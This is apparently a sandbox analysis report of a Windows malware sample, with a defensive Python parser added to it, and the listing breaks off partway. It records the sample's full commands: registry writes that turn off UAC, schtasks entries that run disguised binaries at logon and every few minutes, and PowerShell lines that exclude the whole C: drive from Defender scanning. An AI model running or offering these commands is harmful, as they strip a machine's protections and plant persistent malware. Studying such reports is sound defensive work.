PID 2360 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2360 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe C:\Windows\System32\cmd.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2800 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2876 wrote to memory of 2124 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 2948 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2124 wrote to memory of 1748 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2948 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 1612 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 2576 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 1612 wrote to memory of 2772 N/A C:\Windows\System32\WScript.exe C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe
PID 2772 wrote to memory of 2412 N/A C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe C:\Windows\System32\WScript.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
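The rows above show both the original sample and its dropped copy (WMIADAP.exe under the SQL Server Compact Edition folder) writing the same three values under Policies\System again and again. Together they switch UAC off: EnableLUA=0 disables UAC outright (effective at the next logon/reboot), ConsentPromptBehaviorAdmin=0 lets administrators elevate silently, and PromptOnSecureDesktop=0 removes the secure-desktop isolation of whatever prompt remains. The Python below is an added example, not part of this report: it parses rows in the report's own format, replays them onto a UAC-enabled baseline, and states the resulting posture. The baseline defaults and the row regex are this example's assumptions; the sample rows are copied from the table.

```python
"""Added example (not from the sandbox report): replay 'System policy
modification' rows onto a UAC-enabled baseline and report the outcome."""
import re
from collections import defaultdict

UAC_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Values of a default, UAC-enabled Windows install (constructed baseline, not from the report).
SECURE_DEFAULTS = {
    "EnableLUA": 1,                    # UAC on
    "ConsentPromptBehaviorAdmin": 5,   # prompt for consent for non-Windows binaries
    "PromptOnSecureDesktop": 1,        # prompts shown on the secure desktop
}

# One report row: Set value (int) <key>\<name> = "<value>" <process> N/A
ROW_RE = re.compile(
    r'^Set value \(int\) (?P<key>\\REGISTRY\\MACHINE\\\S+)\\(?P<name>\w+) = "(?P<value>-?\d+)" (?P<process>.+?) N/A$'
)

def parse_rows(text):
    """Yield (key, name, value, process) for every registry-write row in text."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            yield m["key"], m["name"], int(m["value"]), m["process"]

def uac_state_after(rows):
    """Apply the writes in order to the baseline; return the final values and,
    per value, the set of processes that wrote it."""
    state = dict(SECURE_DEFAULTS)
    writers = defaultdict(set)
    for key, name, value, process in rows:
        if key.lower() != UAC_KEY.lower() or name not in state:
            continue                       # some other key or an unrelated value
        state[name] = value
        writers[name].add(process)
    return state, writers

def uac_verdict(state):
    """Human-readable findings for a Policies\\System value set."""
    findings = []
    if state["EnableLUA"] == 0:
        findings.append("EnableLUA=0: UAC disabled (effective after the next logon/reboot)")
    if state["ConsentPromptBehaviorAdmin"] == 0:
        findings.append("ConsentPromptBehaviorAdmin=0: administrators elevate without a prompt")
    if state["PromptOnSecureDesktop"] == 0:
        findings.append("PromptOnSecureDesktop=0: prompts no longer isolated on the secure desktop")
    return findings

# Rows copied from the report table (a representative subset).
SAMPLE_ROWS = r'''
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
'''

if __name__ == "__main__":
    state, writers = uac_state_after(parse_rows(SAMPLE_ROWS))
    for finding in uac_verdict(state):
        print(finding)
    for name, procs in writers.items():
        print(name, "written by:", ", ".join(sorted(procs)))
```

On a live host the same three values are read with `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA` (and the other two names); a value of 0 for any of them on a machine that also carries the scheduled tasks listed further down is a strong confirmation of this infection rather than an administrator's choice.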

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe

"C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 5 /tr "'C:\Users\Default\NetHood\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\Idle.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 9 /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Windows\AppCompat\Programs\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\audiodg.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Videos\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\de-DE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 8 /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\WMIADAP.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 8 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 13 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\OSPPSVC.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 7 /tr "'C:\Windows\fr-FR\lsm.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hs0sn2L6wi.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d3cdb8ee-0726-4212-b937-b3beddfec743.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3fc57db3-e45e-4322-8a73-b1b80b2d87a8.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3b2a2203-4a5d-4a4a-a926-4c350a596aa9.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\71a54d09-d7d0-40f8-99cb-ef77c22aa4c9.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b3a74449-cbc7-4681-8a73-247704307d6d.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e72ad55-b141-43db-aeae-473cf7b63099.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\53e2a958-5a4b-41d6-9f4e-c25d3c55600f.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f6946b19-d9f7-43a1-b77e-0b6af9bf0db5.vbs"

C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe

"C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\WMIADAP.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2e32edd9-6e70-4578-94ef-ee9f3be44825.vbs"

C:\Windows\System32\WScript.exe

